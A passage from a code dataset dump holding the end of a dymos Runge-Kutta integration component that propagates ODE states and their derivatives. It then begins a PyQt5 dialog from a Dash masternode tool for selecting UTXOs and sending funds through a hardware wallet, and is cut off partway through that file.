rates wrt the inputs.\n\n Note that the control parameterization `u` undergoes an interpolation to provide the\n control values at any given time. 
The ODE is then a function of these interpolated control\n values, we'll call them `u_hat`. Technically, the derivatives wrt to `u` need to be chained\n together, but in this implementation the interpolation is part of the execution of the ODE\n and the chained derivatives are captured correctly there.\n\n Parameters\n ----------\n x : np.ndarray\n A flattened, contiguous vector of the state values.\n t : float\n The current time of the integration.\n theta : np.ndarray\n A flattened, contiguous vector of the ODE parameter values.\n f_x : np.ndarray\n A matrix of the derivative of each element of the rates `f` wrt each value in `x`.\n f_t : np.ndarray\n A matrix of the derivatives of each element of the rates `f` wrt `time`.\n f_theta : np.ndarray\n A matrix of the derivatives of each element of the rates `f` wrt the parameters `theta`.\n y_x : np.ndarray\n A matrix of the derivative of each element of the rates `y` wrt each value in `x`.\n y_t : np.ndarray\n A matrix of the derivatives of each element of the rates `y` wrt `time`.\n y_theta : np.ndarray\n A matrix of the derivatives of each element of the rates `y` wrt the parameters `theta`.\n \"\"\"\n # transcribe time\n self._prob.set_val('time', t, units=self.time_options['units'])\n self._prob.set_val('t_initial', theta[0, 0], units=self.time_options['units'])\n self._prob.set_val('t_duration', theta[1, 0], units=self.time_options['units'])\n\n # transcribe states\n for name in self.state_options:\n input_name = self._state_input_names[name]\n self._prob.set_val(input_name, x[self.state_idxs[name], 0])\n\n # transcribe parameters\n for name in self.parameter_options:\n input_name = self._param_input_names[name]\n self._prob.set_val(input_name, theta[self._parameter_idxs_in_theta[name], 0])\n\n # transcribe controls\n for name in self.control_options:\n input_name = self._control_input_names[name]\n self._prob.set_val(input_name, theta[self._control_idxs_in_theta[name], 0])\n\n for name in self.polynomial_control_options:\n input_name = self._polynomial_control_input_names[name]\n self._prob.set_val(input_name, theta[self._polynomial_control_idxs_in_theta[name], 0])\n\n # Re-run in case the inputs have changed.\n self._prob.run_model()\n\n totals = self._prob.compute_totals(of=self._totals_of_names, wrt=self._totals_wrt_names,\n use_abs_names=False)\n\n for state_name in self.state_options:\n of_name = f'state_rate_collector.state_rates:{state_name}_rate'\n idxs = self.state_idxs[state_name]\n f_t[self.state_idxs[state_name]] = totals[of_name, 'time']\n\n for state_name_wrt in self.state_options:\n idxs_wrt = self.state_idxs[state_name_wrt]\n px_px = totals[of_name, self._state_input_names[state_name_wrt]]\n f_x[idxs, idxs_wrt] = px_px.ravel()\n\n f_theta[idxs, 0] = totals[of_name, 't_initial']\n f_theta[idxs, 1] = totals[of_name, 't_duration']\n\n for param_name_wrt in self.parameter_options:\n idxs_wrt = self._parameter_idxs_in_theta[param_name_wrt]\n px_pp = totals[of_name, self._param_input_names[param_name_wrt]]\n f_theta[idxs, idxs_wrt] = px_pp.ravel()\n\n for control_name_wrt in self.control_options:\n idxs_wrt = self._control_idxs_in_theta[control_name_wrt]\n px_pu = totals[of_name, self._control_input_names[control_name_wrt]]\n f_theta[idxs, idxs_wrt] = px_pu.ravel()\n\n for pc_name_wrt in self.polynomial_control_options:\n idxs_wrt = self._polynomial_control_idxs_in_theta[pc_name_wrt]\n px_pu = totals[of_name, self._polynomial_control_input_names[pc_name_wrt]]\n f_theta[idxs, idxs_wrt] = px_pu.ravel()\n\n if y_x is not None 
and y_t is not None and y_theta is not None:\n for control_name in self.control_options:\n wrt_name = self._control_input_names[control_name]\n idxs_wrt = self._control_idxs_in_theta[control_name]\n of_name = self._control_output_names[control_name]\n of_rate_name = self._control_rate_names[control_name]\n of_rate2_name = self._control_rate2_names[control_name]\n\n of_idxs = self._control_idxs_in_y[control_name]\n of_rate_idxs = self._control_rate_idxs_in_y[control_name]\n of_rate2_idxs = self._control_rate2_idxs_in_y[control_name]\n\n y_t[of_idxs, 0] = totals[of_name, 'time']\n y_t[of_rate_idxs, 0] = totals[of_rate_name, 'time']\n y_t[of_rate2_idxs, 0] = totals[of_rate2_name, 'time']\n\n y_theta[of_idxs, 1] = totals[of_name, 't_duration']\n y_theta[of_rate_idxs, 1] = totals[of_rate_name, 't_duration']\n y_theta[of_rate2_idxs, 1] = totals[of_rate2_name, 't_duration']\n\n y_theta[of_idxs, idxs_wrt] = totals[of_name, wrt_name]\n y_theta[of_rate_idxs, idxs_wrt] = totals[of_rate_name, wrt_name]\n y_theta[of_rate2_idxs, idxs_wrt] = totals[of_rate2_name, wrt_name]\n\n for polynomial_control_name in self.polynomial_control_options:\n wrt_name = self._polynomial_control_input_names[polynomial_control_name]\n idxs_wrt = self._polynomial_control_idxs_in_theta[polynomial_control_name]\n of_name = self._polynomial_control_output_names[polynomial_control_name]\n of_rate_name = self._polynomial_control_rate_names[polynomial_control_name]\n of_rate2_name = self._polynomial_control_rate2_names[polynomial_control_name]\n\n of_idxs = self._polynomial_control_idxs_in_y[polynomial_control_name]\n of_rate_idxs = self._polynomial_control_rate_idxs_in_y[polynomial_control_name]\n of_rate2_idxs = self._polynomial_control_rate2_idxs_in_y[polynomial_control_name]\n\n y_t[of_idxs, 0] = totals[of_name, 'time']\n y_t[of_rate_idxs, 0] = totals[of_rate_name, 'time']\n y_t[of_rate2_idxs, 0] = totals[of_rate2_name, 'time']\n\n y_theta[of_idxs, 1] = totals[of_name, 't_duration']\n y_theta[of_rate_idxs, 1] = totals[of_rate_name, 't_duration']\n y_theta[of_rate2_idxs, 1] = totals[of_rate2_name, 't_duration']\n\n y_theta[of_idxs, idxs_wrt] = totals[of_name, wrt_name]\n y_theta[of_rate_idxs, idxs_wrt] = totals[of_rate_name, wrt_name]\n y_theta[of_rate2_idxs, idxs_wrt] = totals[of_rate2_name, wrt_name]\n\n for name, options in self._filtered_timeseries_outputs.items():\n idxs_of = self._timeseries_idxs_in_y[name]\n of_name = options['path']\n\n y_t[idxs_of, 0] = totals[options['path'], 'time']\n\n y_theta[idxs_of, 0] = totals[of_name, 't_initial']\n y_theta[idxs_of, 1] = totals[of_name, 't_duration']\n\n for state_name_wrt in self.state_options:\n idxs_wrt = self.state_idxs[state_name_wrt]\n py_px = totals[of_name, self._state_input_names[state_name_wrt]]\n y_x[idxs_of, idxs_wrt] = py_px.ravel()\n\n for param_name_wrt in self.parameter_options:\n idxs_wrt = self._parameter_idxs_in_theta[param_name_wrt]\n py_pp = totals[of_name, self._param_input_names[param_name_wrt]]\n y_theta[idxs_of, idxs_wrt] = py_pp.ravel()\n\n for control_name_wrt in self.control_options:\n idxs_wrt = self._control_idxs_in_theta[control_name_wrt]\n py_puhat = totals[of_name, self._control_input_names[control_name_wrt]]\n y_theta[idxs_of, idxs_wrt] = py_puhat.ravel()\n\n for pc_name_wrt in self.polynomial_control_options:\n idxs_wrt = self._polynomial_control_idxs_in_theta[pc_name_wrt]\n py_puhat = totals[of_name, self._polynomial_control_input_names[pc_name_wrt]]\n y_theta[idxs_of, idxs_wrt] = py_puhat.ravel()\n\n def _propagate(self, inputs, outputs, 
derivs=None):\n \"\"\"\n Propagate the states from t_initial to t_initial + t_duration, optionally computing\n the derivatives along the way and caching the current time and state values.\n\n Parameters\n ----------\n inputs : vector\n The inputs from the compute call to the RKIntegrationComp.\n outputs : vector\n The outputs from the compute call to the RKIntegrationComp.\n derivs : vector or None\n If derivatives are to be calculated in a forward mode, this is the vector of partials\n from the compute_partials call to this component. If derivatives are not to be\n computed, this should be None.\n \"\"\"\n gd = self._grid_data\n N = self.options['num_steps_per_segment']\n\n # RK Constants\n rk = rk_methods[self.options['method']]\n a = rk['a']\n b = rk['b']\n c = rk['c']\n num_stages = len(b)\n\n # Initialize states\n x = self._x\n t = self._t\n theta = self._theta\n\n # Make t_initial and t_duration the first two elements of the ODE parameter vector.\n theta[0] = inputs['t_initial'].copy()\n theta[1] = inputs['t_duration'].copy()\n\n f_x = self._f_x\n f_t = self._f_t\n f_theta = self._f_theta\n\n y_x = self._y_x\n y_t = self._y_t\n y_theta = self._y_theta\n\n # Initialize parameters\n for name in self.parameter_options:\n theta[self._parameter_idxs_in_theta[name], 0] = inputs[f'parameters:{name}'].ravel()\n\n # Initialize controls\n for name in self.control_options:\n theta[self._control_idxs_in_theta[name], 0] = inputs[f'controls:{name}'].ravel()\n\n # Initialize polynomial controls\n for name in self.polynomial_control_options:\n theta[self._polynomial_control_idxs_in_theta[name], 0] = \\\n inputs[f'polynomial_controls:{name}'].ravel()\n\n seg_durations = theta[1] * np.diff(gd.segment_ends) / 2.0\n\n # step counter\n row = 0\n\n for seg_i in range(gd.num_segments):\n self._prob.model._get_subsystem('ode_eval').set_segment_index(seg_i)\n\n # Initialize, t, x, h, and derivatives for the start of the current segment\n self._initialize_segment(row, inputs, derivs=derivs)\n\n h = np.asarray(seg_durations[seg_i] / N, dtype=self._TYPE)\n # On each segment, the total derivative of the stepsize h is a function of\n # the duration of the phase (the second element of the parameter vector after states)\n if derivs:\n self._dh_dZ[row:row+N+1, 0, self.x_size+1] = seg_durations[seg_i] / theta[1] / N\n\n rm1 = row\n row = row + 1\n\n for q in range(N):\n # Compute the state rates and their partials at the start of the step\n self.eval_f(x[rm1, ...], t[rm1, 0], theta, self._k_q[0, ...], y=self._y[rm1, ...])\n\n if derivs:\n # Compute the state rate derivatives\n self.eval_f_derivs(x[rm1, ...], t[rm1, 0], theta, f_x, f_t, f_theta,\n y_x, y_t, y_theta)\n\n self._dkq_dZ[0, ...] = \\\n f_t @ self._dt_dZ[rm1, ...] + f_x @ self._dx_dZ[rm1, ...] + \\\n f_theta @ self._dtheta_dZ\n\n self._dy_dZ[rm1, ...] = \\\n y_x @ self._dx_dZ[rm1, ...] + y_t @ self._dt_dZ[rm1, ...] + \\\n y_theta @ self._dtheta_dZ\n\n for i in range(1, num_stages):\n T_i = t[rm1, ...] + c[i] * h\n a_tdot_k = np.tensordot(a[i, :i], self._k_q[:i, ...], axes=(0, 0))\n # a_tdot_k = np.einsum('i,ijk->jk', a[i, :i], self._k_q[:i, ...])\n X_i = x[rm1, ...] + h * a_tdot_k\n self.eval_f(X_i, T_i, theta, self._k_q[i, ...])\n\n if derivs:\n self.eval_f_derivs(X_i, T_i, theta, f_x, f_t, f_theta)\n self._dTi_dZ[...] = self._dt_dZ[row - 1, ...] + c[i] * self._dh_dZ[rm1, ...]\n a_tdot_dkqdz = np.tensordot(a[i, :i], self._dkq_dZ[:i, ...], axes=(0, 0))\n # a_tdot_dkqdz = np.einsum('i,ijk->jk', a[i, :i], self._dkq_dZ[:i, ...])\n self._dXi_dZ[...] 
= self._dx_dZ[rm1, ...] + a_tdot_k @ self._dh_dZ[rm1, ...] + h * a_tdot_dkqdz\n self._dkq_dZ[i, ...] = f_t @ self._dTi_dZ + f_x @ self._dXi_dZ + f_theta @ self._dtheta_dZ\n\n b_tdot_kq = np.tensordot(b, self._k_q, axes=(0, 0))\n # b_tdot_kq = np.einsum('i,ijk->jk', b, self._k_q)\n x[row, ...] = x[rm1, ...] + h * b_tdot_kq\n t[row, 0] = t[rm1, 0] + h\n\n if derivs:\n b_tdot_dkqdz = np.tensordot(b, self._dkq_dZ, axes=(0, 0))\n # b_tdot_dkqdz = np.einsum('i,ijk->jk', b, self._dkq_dZ)\n self._dx_dZ[row, ...] = \\\n self._dx_dZ[rm1, ...] + b_tdot_kq @ self._dh_dZ[rm1, ...] + h * b_tdot_dkqdz\n self._dt_dZ[row, ...] = self._dt_dZ[rm1, ...] + self._dh_dZ[rm1, ...]\n\n rm1 = row\n row = row + 1\n\n # Evaluate the ODE at the last point in the segment (with the final times and states)\n self.eval_f(x[rm1, ...], t[rm1, 0], theta, self._k_q[0, ...], y=self._y[rm1, ...])\n\n if derivs:\n self.eval_f_derivs(x[rm1, ...], t[rm1, 0], theta, f_x, f_t, f_theta, y_x, y_t, y_theta)\n self._dy_dZ[rm1, ...] = y_x @ self._dx_dZ[rm1, ...] + y_t @ self._dt_dZ[rm1, ...] + y_theta @ self._dtheta_dZ\n\n def compute(self, inputs, outputs):\n \"\"\"\n Compute propagated state values.\n\n Parameters\n ----------\n inputs : `Vector`\n `Vector` containing inputs.\n outputs : `Vector`\n `Vector` containing outputs.\n \"\"\"\n self._propagate(inputs, outputs)\n\n # Unpack the outputs\n idxs = self._output_src_idxs\n outputs['t_final'] = self._t[-1, ...]\n\n # Extract time\n outputs['time'] = self._t[idxs, ...]\n outputs['time_phase'] = self._t[idxs, ...] - inputs['t_initial']\n\n # Extract the state values\n for state_name, options in self.state_options.items():\n of = self._state_output_names[state_name]\n outputs[of] = self._x[idxs, self.state_idxs[state_name]]\n\n # Extract the control values and rates\n for control_name, options in self.control_options.items():\n oname = self._control_output_names[control_name]\n rate_name = self._control_rate_names[control_name]\n rate2_name = self._control_rate2_names[control_name]\n outputs[oname] = self._y[idxs, self._control_idxs_in_y[control_name]]\n outputs[rate_name] = self._y[idxs, self._control_rate_idxs_in_y[control_name]]\n outputs[rate2_name] = self._y[idxs, self._control_rate2_idxs_in_y[control_name]]\n\n # Extract the control values and rates\n for control_name, options in self.polynomial_control_options.items():\n oname = self._polynomial_control_output_names[control_name]\n rate_name = self._polynomial_control_rate_names[control_name]\n rate2_name = self._polynomial_control_rate2_names[control_name]\n outputs[oname] = self._y[idxs, self._polynomial_control_idxs_in_y[control_name]]\n outputs[rate_name] = self._y[idxs, self._polynomial_control_rate_idxs_in_y[control_name]]\n outputs[rate2_name] = self._y[idxs, self._polynomial_control_rate2_idxs_in_y[control_name]]\n\n # Extract the timeseries outputs\n for name, options in self._filtered_timeseries_outputs.items():\n oname = self._timeseries_output_names[name]\n outputs[oname] = self._y[idxs, self._timeseries_idxs_in_y[name]]\n\n def compute_partials(self, inputs, partials):\n \"\"\"\n Compute derivatives of propagated states wrt the inputs.\n\n Parameters\n ----------\n inputs : Vector\n Unscaled, dimensional input variables read via inputs[key].\n partials : Jacobian\n Subjac components written to partials[output_name, input_name].\n \"\"\"\n self._propagate(inputs, outputs=False, derivs=True)\n\n idxs = self._output_src_idxs\n partials['time', 't_duration'] = self._dt_dZ[idxs, 0, self.x_size+1]\n partials['time_phase', 
't_duration'] = self._dt_dZ[idxs, 0, self.x_size+1]\n\n for state_name in self.state_options:\n of = self._state_output_names[state_name]\n\n # Unpack the derivatives\n of_rows = self.state_idxs[state_name]\n\n partials[of, 't_initial'] = self._dx_dZ[idxs, of_rows, self.x_size]\n partials[of, 't_duration'] = self._dx_dZ[idxs, of_rows, self.x_size+1]\n\n for wrt_state_name in self.state_options:\n wrt = self._state_input_names[wrt_state_name]\n wrt_cols = self._state_idxs_in_Z[wrt_state_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_param_name in self.parameter_options:\n wrt = self._param_input_names[wrt_param_name]\n wrt_cols = self._parameter_idxs_in_Z[wrt_param_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_control_name in self.control_options:\n wrt = self._control_input_names[wrt_control_name]\n wrt_cols = self._control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_pc_name in self.polynomial_control_options:\n wrt = self._polynomial_control_input_names[wrt_pc_name]\n wrt_cols = self._polynomial_control_idxs_in_Z[wrt_pc_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for control_name in self.control_options:\n of = self._control_output_names[control_name]\n of_rate = self._control_rate_names[control_name]\n of_rate2 = self._control_rate2_names[control_name]\n\n # Unpack the derivatives\n of_rows = self._control_idxs_in_y[control_name]\n of_rate_rows = self._control_rate_idxs_in_y[control_name]\n of_rate2_rows = self._control_rate2_idxs_in_y[control_name]\n\n wrt_cols = self.x_size + 1\n partials[of_rate, 't_duration'] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, 't_duration'] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for wrt_control_name in self.control_options:\n wrt = self._control_input_names[wrt_control_name]\n wrt_cols = self._control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n partials[of_rate, wrt] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, wrt] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for name in self.polynomial_control_options:\n of = self._polynomial_control_output_names[name]\n of_rate = self._polynomial_control_rate_names[name]\n of_rate2 = self._polynomial_control_rate2_names[name]\n\n # Unpack the derivatives\n of_rows = self._polynomial_control_idxs_in_y[name]\n of_rate_rows = self._polynomial_control_rate_idxs_in_y[name]\n of_rate2_rows = self._polynomial_control_rate2_idxs_in_y[name]\n\n wrt_cols = self.x_size + 1\n partials[of_rate, 't_duration'] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, 't_duration'] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for wrt_control_name in self.polynomial_control_options:\n wrt = self._polynomial_control_input_names[wrt_control_name]\n wrt_cols = self._polynomial_control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n partials[of_rate, wrt] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, wrt] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for name, options in self._filtered_timeseries_outputs.items():\n of = self._timeseries_output_names[name]\n of_rows = self._timeseries_idxs_in_y[name]\n\n partials[of, 't_initial'] = self._dy_dZ[idxs, of_rows, self.x_size]\n partials[of, 't_duration'] = self._dy_dZ[idxs, of_rows, self.x_size+1]\n\n for wrt_state_name in self.state_options:\n wrt = 
self._state_input_names[wrt_state_name]\n wrt_cols = self._state_idxs_in_Z[wrt_state_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_param_name in self.parameter_options:\n wrt = self._param_input_names[wrt_param_name]\n wrt_cols = self._parameter_idxs_in_Z[wrt_param_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_control_name in self.control_options:\n wrt = self._control_input_names[wrt_control_name]\n wrt_cols = self._control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_pc_name in self.polynomial_control_options:\n wrt = self._polynomial_control_input_names[wrt_pc_name]\n wrt_cols = self._polynomial_control_idxs_in_Z[wrt_pc_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n","sub_path":"dymos/transcriptions/explicit_shooting/rk_integration_comp.py","file_name":"rk_integration_comp.py","file_ext":"py","file_size_in_byte":62753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"157121855","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: Bertrand256\n# Created on: 2017-04\n\nimport datetime\nfrom operator import itemgetter\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QAbstractTableModel, QVariant, Qt, pyqtSlot\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import QDialog, QTableView, QHeaderView, QMessageBox\nimport app_cache as cache\nfrom app_config import MIN_TX_FEE, DATETIME_FORMAT\nfrom dashd_intf import DashdInterface, DashdIndexException\nfrom hw_intf import prepare_transfer_tx, hw_get_address\nfrom wnd_utils import WndUtils\nfrom ui import ui_send_payout_dlg\n\n\nclass PaymentTableModel(QAbstractTableModel):\n def __init__(self, parent, hide_collaterals_utxos, checked_changed_callback):\n QAbstractTableModel.__init__(self, parent)\n self.checked = False\n self.utxos = []\n self.hide_collaterals_utxos = hide_collaterals_utxos\n self.checked_changed_callback = checked_changed_callback\n self.columns = [\n # field_name, column header, visible, default col width\n ('satoshis', 'Amount (Dash)', True, 100),\n ('time_str', 'TX Date/Time', True, 140),\n ('mn', 'Masternode', True, 80),\n ('address', 'Address', True, 140),\n ('txid', 'TX ID', True, 220),\n ('outputIndex', 'TX Idx', True, 40)\n ]\n\n def setHideCollateralsUtxos(self, hide):\n self.hide_collaterals_utxos = hide\n self.beginResetModel()\n self.endResetModel()\n\n def columnCount(self, parent=None, *args, **kwargs):\n return len(self.columns) + 1\n\n def rowCount(self, parent=None, *args, **kwargs):\n rows = 0\n for utxo in self.utxos:\n if not self.hide_collaterals_utxos or not utxo.get('collateral', False):\n rows += 1\n return rows\n\n def headerData(self, section, orientation, role=None):\n if role != 0:\n return QVariant()\n if orientation == 0x1:\n if section > 0: # section 0 - checkboxes\n if section - 1 < len(self.columns):\n return self.columns[section - 1][1]\n return ''\n else:\n return \"Row\"\n\n def getDefaultColWidths(self):\n widths = [col[3] for col in self.columns]\n widths.insert(0, 35) # col width for checkbox column\n return widths\n\n def flags(self, index):\n if index.column() == 0:\n ret = Qt.ItemIsUserCheckable | Qt.ItemIsEnabled\n else:\n ret = Qt.ItemIsEnabled | Qt.ItemIsSelectable\n return ret\n\n def getUtxo(self, index):\n \"\"\"\n Returns utxo by its index. 
If self.hide_collaterals_utxos is True, utxo with 'collateral' value \n set to True is skipped.\n :return: utxo dict\n \"\"\"\n cur_idx = 0\n for utxo in self.utxos:\n if self.hide_collaterals_utxos and utxo.get('collateral', False):\n continue\n if cur_idx == index:\n return utxo\n cur_idx += 1\n return None\n\n def data(self, index, role=None):\n if index.isValid():\n col = index.column()\n row = index.row()\n if row < len(self.utxos):\n utxo = self.getUtxo(row)\n if utxo:\n if col == 0:\n # select tx checbox\n if role == Qt.CheckStateRole:\n return QVariant(Qt.Checked if utxo.get('checked', False) else Qt.Unchecked)\n elif role == Qt.DisplayRole:\n field_name = self.columns[col-1][0]\n if field_name == 'satoshis':\n return str(round(utxo['satoshis'] / 1e8, 8))\n else:\n return str(utxo.get(field_name, ''))\n # elif role == QtCore.Qt.FontRole:\n elif role == Qt.ForegroundRole:\n if utxo['collateral']:\n return QColor(Qt.red)\n return QVariant()\n\n def setData(self, index, value, role=None):\n if index.isValid() and role == QtCore.Qt.CheckStateRole:\n row = index.row()\n utxo = self.getUtxo(row)\n if utxo:\n if value == QtCore.Qt.Checked:\n utxo['checked'] = True\n else:\n utxo['checked'] = False\n self.dataChanged.emit(index, index)\n # notify - sum amount has changed\n if self.checked_changed_callback:\n self.checked_changed_callback()\n return True\n\n def getCheckedSumAmount(self):\n # sum amount of all checked utxos\n amount = 0\n for utxo in self.utxos:\n if self.hide_collaterals_utxos and utxo.get('collateral', False):\n continue\n if utxo['checked']:\n amount += utxo['satoshis']\n return amount\n\n def getSelectedUtxos(self):\n utxos = []\n for utxo in self.utxos:\n if self.hide_collaterals_utxos and utxo.get('collateral', False):\n continue\n if utxo['checked']:\n utxos.append(utxo)\n return utxos\n\n def setUtxos(self, utxos, masternodes):\n def utxo_assigned_to_collateral(utxo):\n for mn in masternodes:\n if mn.collateralTx == utxo['txid'] and str(mn.collateralTxIndex) == str(utxo['outputIndex']):\n return True\n return False\n def mn_by_address(address):\n for mn in masternodes:\n if mn.collateralAddress == address:\n return mn.name\n return ''\n\n for utxo in utxos:\n if utxo_assigned_to_collateral(utxo):\n utxo['collateral'] = True\n utxo['checked'] = False\n else:\n utxo['collateral'] = False\n utxo['checked'] = True\n utxo['mn'] = mn_by_address(utxo['address'])\n\n self.utxos = sorted(utxos, key=itemgetter('height'), reverse=True)\n self.beginResetModel()\n self.endResetModel()\n if self.checked_changed_callback:\n self.checked_changed_callback()\n\n\nclass SendPayoutDlg(QDialog, ui_send_payout_dlg.Ui_SendPayoutDlg, WndUtils):\n error_signal = QtCore.pyqtSignal(str)\n thread_finished = QtCore.pyqtSignal()\n\n def __init__(self, utxos_source, main_ui):\n \"\"\"\n Constructor\n :param utxos_source: list of tuples (dash address, bip32 path) - from which\n we'll list all unspent outputs\n :param masternodes: list of masternodes in configuration; used for checking if txid/index \n is assigned to mn's collateral \n \"\"\"\n QDialog.__init__(self)\n WndUtils.__init__(self, main_ui.app_path)\n assert isinstance(utxos_source, list)\n assert isinstance(main_ui.dashd_intf, DashdInterface)\n self.utxos_source = utxos_source\n self.dashd_intf = main_ui.dashd_intf\n self.table_model = None\n self.utxos = []\n self.masternodes = main_ui.config.masternodes\n self.main_ui = main_ui\n self.setupUi()\n\n def setupUi(self):\n ui_send_payout_dlg.Ui_SendPayoutDlg.setupUi(self, self)\n assert 
isinstance(self.tableView, QTableView)\n self.resize(cache.get_value('WndPayoutWidth', 800, int),\n cache.get_value('WndPayoutHeight', 460, int))\n self.setWindowTitle('Transfer funds')\n self.closeEvent = self.closeEvent\n self.chbHideCollateralTx.setChecked(True)\n self.btnClose.clicked.connect(self.btnCloseClick)\n self.btnSend.clicked.connect(self.btnSendClick)\n self.edtDestAddress.setText(cache.get_value('WndPayoutPaymentAddress', '', str))\n self.edtDestAddress.textChanged.connect(self.edtDestAddressChanged)\n self.setIcon(self.btnCheckAll, 'check.png')\n self.setIcon(self.btnUncheckAll, 'uncheck.png')\n\n self.table_model = PaymentTableModel(None, self.chbHideCollateralTx.isChecked(), self.onUtxoCheckChanged)\n self.tableView.setModel(self.table_model)\n self.tableView.horizontalHeader().resizeSection(0, 35)\n self.tableView.horizontalHeader().setSectionResizeMode(0, QHeaderView.Fixed)\n self.tableView.verticalHeader().setDefaultSectionSize(self.tableView.verticalHeader().fontMetrics().height() + 6)\n\n # set utxo table default column widths\n cws = cache.get_value('WndPayoutColWidths', self.table_model.getDefaultColWidths(), list)\n for col, w in enumerate(cws):\n self.tableView.setColumnWidth(col, w)\n\n self.chbHideCollateralTx.toggled.connect(self.chbHideCollateralTxToggled)\n self.resizeEvent = self.resizeEvent\n\n self.threadFunctionDialog(self.load_utxos_thread, (), True, center_by_window=self.main_ui)\n self.table_model.setUtxos(self.utxos, self.masternodes)\n\n def closeEvent(self, event):\n w = self.size().width()\n h = self.size().height()\n cache.set_value('WndPayoutWidth', w)\n cache.set_value('WndPayoutHeight', h)\n # save column widths\n widths = []\n for col in range(self.table_model.columnCount()):\n widths.append(self.tableView.columnWidth(col))\n cache.set_value('WndPayoutColWidths', widths)\n\n def edtDestAddressChanged(self):\n # save payment address to cache\n cache.set_value('WndPayoutPaymentAddress', self.edtDestAddress.text())\n\n def chbHideCollateralTxToggled(self):\n self.table_model.setHideCollateralsUtxos(self.chbHideCollateralTx.isChecked())\n\n def onUtxoCheckChanged(self):\n self.lblAmount.setText(str(round(self.table_model.getCheckedSumAmount() / 1e8, 8)))\n\n # estimate transaction fee\n utxos = self.table_model.getSelectedUtxos()\n fee = round((len(utxos) * 148 + 33 - 10) / 1000) * MIN_TX_FEE\n if not fee:\n fee = MIN_TX_FEE\n self.edtTxFee.setValue(round(fee / 1e8, 8))\n\n @pyqtSlot(bool)\n def on_btnUncheckAll_clicked(self):\n for utxo in self.utxos:\n utxo['checked'] = False\n self.table_model.beginResetModel()\n self.table_model.endResetModel()\n self.onUtxoCheckChanged()\n\n @pyqtSlot(bool)\n def on_btnCheckAll_clicked(self):\n for utxo in self.utxos:\n utxo['checked'] = True\n self.table_model.beginResetModel()\n self.table_model.endResetModel()\n self.onUtxoCheckChanged()\n\n def btnSendClick(self):\n \"\"\"\n Sends funds to Dash address specified by user.\n \"\"\"\n utxos = self.table_model.getSelectedUtxos()\n if len(utxos):\n address = self.edtDestAddress.text()\n if address:\n if not self.main_ui.connectHardwareWallet():\n return\n\n bip32_to_address = {} # for saving addresses read from HW by BIP32 path\n\n # check if user selected masternode collateral transaction; if so display warning\n # also check if UTXO dash address matches address of BIP32 path in HW\n for utxo in utxos:\n if utxo['collateral']:\n if self.queryDlg(\n \"Warning: you are going to transfer Masternode's collateral (1000 Dash) transaction \"\n \"output. 
Proceeding will result in broken Masternode.\\n\\n\"\n \"Do you really want to continue?\",\n buttons=QMessageBox.Yes | QMessageBox.Cancel,\n default_button=QMessageBox.Cancel, icon=QMessageBox.Warning) == QMessageBox.Cancel:\n return\n bip32_path = utxo.get('bip32_path', None)\n if not bip32_path:\n self.errorMsg('No BIP32 path for UTXO: %s. Cannot continue.' % utxo['txid'])\n return\n\n addr_hw = bip32_to_address.get(bip32_path, None)\n if not addr_hw:\n address_n = self.main_ui.hw_client.expand_path(bip32_path)\n addr_hw = hw_get_address(self.main_ui.hw_client, address_n)\n bip32_to_address[bip32_path] = addr_hw\n if addr_hw != utxo['address']:\n self.errorMsg(\"Current Dash address from %s's path %s (%s) doesn't match address of funds \"\n \"being sent (%s).\\n\\nCannot continue.\" %\n (self.main_ui.getHwName(), bip32_path, addr_hw, utxo['address']))\n return\n\n try:\n if self.dashd_intf.validateaddress(address).get('isvalid', False):\n fee = self.edtTxFee.value() * 1e8\n serialized_tx, amount_to_send = prepare_transfer_tx(self.main_ui, utxos, address, fee)\n tx_hex = serialized_tx.hex()\n if len(tx_hex) > 90000:\n self.errorMsg(\"Transaction's length exceeds 90000 bytes. Select less utxo's and try again.\")\n else:\n if self.queryDlg('Broadcast signed transaction?\\n\\n'\n 'Destination address: %s\\n'\n 'Amount to send: %s Dash\\nFee: %s Dash\\n'\n 'Size: %d bytes' % ( address, str(round(amount_to_send / 1e8, 8)),\n str(round(fee / 1e8, 8) ),\n len(tx_hex)/2),\n buttons=QMessageBox.Yes | QMessageBox.Cancel,\n default_button=QMessageBox.Yes) == QMessageBox.Yes:\n\n decoded_tx = self.dashd_intf.decoderawtransaction(tx_hex)\n txid = self.dashd_intf.sendrawtransaction(tx_hex)\n if txid:\n self.infoMsg('Transaction sent. ID: ' + txid)\n else:\n self.errorMsg('Problem with sending transaction: no txid returned')\n else:\n self.errorMsg('Invalid destination Dash address (%s).' % address)\n except Exception as e:\n self.errorMsg(str(e))\n else:\n self.errorMsg('Missing destination Dash address.')\n else:\n self.errorMsg('No utxo to send.')\n\n def btnCloseClick(self):\n self.close()\n\n def load_utxos_thread(self, ctrl):\n if not self.dashd_intf.open():\n self.errorMsg('Dash daemon not connected')\n else:\n try:\n 